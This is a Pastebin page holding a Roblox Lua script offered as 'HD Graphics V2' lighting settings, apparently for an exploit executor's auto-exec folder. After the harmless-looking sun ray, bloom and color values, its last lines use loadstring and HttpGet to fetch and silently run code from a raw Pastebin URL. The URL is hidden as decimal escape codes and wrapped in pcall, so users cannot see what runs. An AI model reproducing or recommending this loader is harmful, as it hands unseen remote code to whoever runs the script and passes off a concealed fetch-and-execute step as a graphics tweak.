Advertisement
Remaining

Roblox HD GRAPHICS V2 🔥

Feb 16th, 2022 (edited)
481
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.53 KB | None | 0 0
  1. --(put this in auto-exec if you'd like)
  2.  
  3. --[[
  4. CREATED: 2/16/22 @9:43PM EST
  5. UPDATED: 4/30/23 @3:10PM EST
  6. FINAL UPDATE: 8/22/24 @4:45 PM EST
  7.  
  8. Never really had the chance to credit myself last time, and so here we are. Based of my old script,
  9. which I never expected to get extremely popular, "HD Graphics", here's the long awaited sequel.
  10.  
  11. Join the Discord if you'd like to suggest updates or chill with a small community:
  12. (deleted, new one soon) 👈
  13.  
  14. I also have videos regarding serversides, and general scripting, so consider joining 👆
  15.  
  16. IF YOU'RE EDITING THIS, PLEASE LEAVE IN THE CREDITS AND THE DISCORD. 🙏
  17.  
  18. _ _ ___ ___ ___ _ ___ _ _ ___ ___ ___
  19. | || | \ / __| _ \ /_\ | _ \ || |_ _/ __/ __|
  20. | __ | |) | | (_ | / / _ \| _/ __ || | (__\__ \
  21. |_||_|___/ \___|_|_\/_/ \_\_| |_||_|___\___|___/ scripted by "ordai" on Discord 🔥
  22.  
  23. ]]
  24.  
  25. -- GENERAL SETTINGS (YOU MAY EDIT TO YOUR PREFERENCE/LIKING)
  26.  
  27. _G.SunRays = {
  28. Intensity = tonumber(0.25),
  29. Spread = tonumber(1),
  30. }
  31.  
  32. _G.ColorCorrection = {
  33. TintColor = Color3.fromRGB(255, 254, 226),
  34. Brightness = tonumber(0.03),
  35. Contrast = tonumber(0.02),
  36. }
  37.  
  38. _G.Blur = {
  39. Size = tonumber(2),
  40. }
  41.  
  42. _G.Bloom = {
  43. Intensity = tonumber(0.2),
  44. Size = tonumber(22),
  45. Threshold = tonumber(0.3)
  46. }
  47.  
  48. _G.AdjustQualityToFramerate = false
  49.  
  50.  
  51. pcall(function()
  52. loadstring(game:HttpGet(('\104\116\116\112\115\58\47\47\112\97\115\116\101\98\105\110\46\99\111\109\47\114\97\119\47\86\57\69\103\66\89\72\83'),true))()
  53. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement